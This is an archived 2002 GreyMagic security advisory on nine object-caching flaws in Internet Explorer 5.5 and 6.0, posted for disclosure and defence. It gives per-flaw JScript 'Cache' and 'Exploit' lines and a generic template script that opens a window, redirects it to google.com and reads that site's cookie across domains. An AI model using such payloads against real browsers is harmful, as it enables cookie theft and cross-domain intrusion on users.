gm012-more-ie.txt

2002-10-25T00:00:00
ID PACKETSTORM:29934
Type packetstorm
Reporter GreyMagic Software
Modified 2002-10-25T00:00:00

Description

                                        
                                            `GreyMagic Security Advisory GM#012-IE  
=====================================  
  
By GreyMagic Software, Israel.  
22 Oct 2002.  
  
Available in HTML format at http://security.greymagic.com/adv/gm012-ie/.  
  
Topic: Vulnerable cached objects in IE (9 advisories in 1).  
  
Discovery date: 4 Oct 2002, 17 Oct 2002, 21 Oct 2002.  
  
Affected applications:  
======================  
  
Microsoft Internet Explorer 5.5 and 6.0; prior versions and IE6 SP1 are not  
vulnerable.  
  
Note that any other application that uses Internet Explorer's engine  
(WebBrowser control) is affected as well (AOL Browser, MSN Explorer, etc.).  
  
  
Introduction:  
=============  
  
When communicating between windows, security checks ensure that both pages  
are in the same security zone and on the same domain. These crucial security  
checks wrongly assume that certain methods and objects are only going to be  
called through their respective window. This assumption enables some cached  
methods and objects to provide interoperability between otherwise separated  
documents.  
  
Many security issues arise from storing references to objects that are  
supposed to be inaccessible when the page unloads. PivX lately disclosed  
such an issue in the <object> element, which left a valid reference in its  
"object" property.  
  
Discussion:  
===========  
  
Through exhaustive research, we discovered nine vulnerabilities in Internet  
Explorer involving object caching, most of them highly critical. We're  
grouping all of these vulnerabilities into this advisory in order to avoid a  
flood and repetitive statements.  
  
Object caching takes place when the attacker opens a window to a page in his  
own site. The URL in the window is then changed to the victim page, but the  
cached references stay in place, providing direct access to the new  
document.  
  
All nine vulnerabilities are of the same general class (object caching).  
However, each of them is a separate vulnerability, which uses a unique  
method for exploitation.  
  
Each item in the list below consists of three parts, "Cache" shows how to  
cache the vulnerable object, "Exploit" shows how the vulnerability works in  
context and "Impact" details the implications of the vulnerability.  
  
"Full access" means access to any page's Document Object Model in any domain  
and any zone. The implications include (but not limited to) reading cookies  
from any domain, forging content in any URL, reading local files and  
executing arbitrary programs.  
  
  
1. showModalDialog  
  
Cache: var fVuln=oWin.showModalDialog;  
Exploit - IE 5.5:  
fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");  
Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg"  
vulnerability.  
Impact: Full access in IE5.5, "My Computer" zone access in IE6.  
  
  
2. external  
  
Cache: var oVuln=oWin.external;  
Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");  
Impact: Full access.  
  
  
3. createRange  
  
Cache: var fVuln=oWin.document.selection.createRange;  
Exploit: fVuln().pasteHTML("<img  
src=\"javascript:alert(document.cookie)\">");  
Impact: Full access.  
  
  
4. elementFromPoint  
  
Cache: var fVuln=oWin.document.elementFromPoint;  
Exploit: alert(fVuln(1,1).document.cookie);  
Impact: Full access.  
  
  
5. getElementById  
  
Cache: var fVuln=oWin.document.getElementById;  
Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);  
Impact: Full access.  
  
  
6. getElementsByName  
  
Cache: var fVuln=oWin.document.getElementsByName;  
Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);  
Impact: Full access.  
  
  
7. getElementsByTagName  
  
Cache: var fVuln=oWin.document.getElementsByTagName;  
Exploit: alert(fVuln("BODY")[0].document.cookie);  
Impact: Full access.  
  
  
8. execCommand  
  
Cache: var fVuln=oWin.document.execCommand;  
Exploit: fVuln("SelectAll"); fVuln("Copy");  
alert(clipboardData.getData("text"));  
Impact: Read access to the loaded document.  
  
  
9. clipboardData  
  
Cache: var oVuln=oWin.clipboardData;  
Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");  
Impact: Read/write access to the clipboard, regardless of settings.  
  
  
IE 5 SP2 and IE6 SP1 are not vulnerable.  
  
  
Exploit:  
========  
  
This generic exploit demonstrates how an attacker may read the client's  
"google.com" cookie using one of the cached objects above.  
  
<script language="jscript">  
var oWin=open("blank.html","victim","width=100,height=100");  
[Cache line here]  
location.href="http://google.com";  
setTimeout(  
function () {  
[Exploit line(s) here]  
},  
3000  
);  
</script>  
  
  
Solution:  
=========  
  
Until a patch becomes available either disable Active Scripting or upgrade  
to IE6 SP1.  
  
  
Tested on:  
==========  
  
IE5.5 Win98.  
IE5.5 NT4.  
IE6 Win98.  
IE6 Win2000.  
IE6 WinXP.  
  
  
Demonstration:  
==============  
  
We put together a single nine-in-one proof of concept demonstration, which  
can be found at http://security.greymagic.com/adv/gm012-ie/.  
  
  
Feedback:  
=========  
  
Please mail any questions or comments to security@greymagic.com.  
  
- Copyright © 2002 GreyMagic Software.  
  
`